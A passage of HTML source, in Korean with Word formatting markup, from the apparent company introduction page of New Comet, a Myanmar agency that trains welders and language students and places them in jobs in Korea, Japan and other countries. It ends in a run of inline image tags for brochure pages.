style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" 